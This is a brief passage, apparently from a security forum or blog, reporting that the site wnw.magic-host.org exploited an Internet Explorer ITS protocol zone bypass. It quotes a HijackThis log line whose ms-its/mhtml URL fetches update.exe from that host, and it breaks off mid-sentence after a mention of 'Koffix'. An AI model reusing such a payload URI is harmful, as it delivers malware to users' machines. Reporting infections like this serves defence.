wnw.magic-host.org seems to have been exploiting the Microsoft Internet Explorer ITS Protocol Zone Bypass Vulnerability, based on the following Hijackthis log entry:
O16 - DPF: {11212111-2121-1311-1141-115611111222} - ms-its:mhtml:file://d: oo.mht!http://wnw.magic-host.org/forums/ima...m::/update.exe
Koffix offers you the possibility to: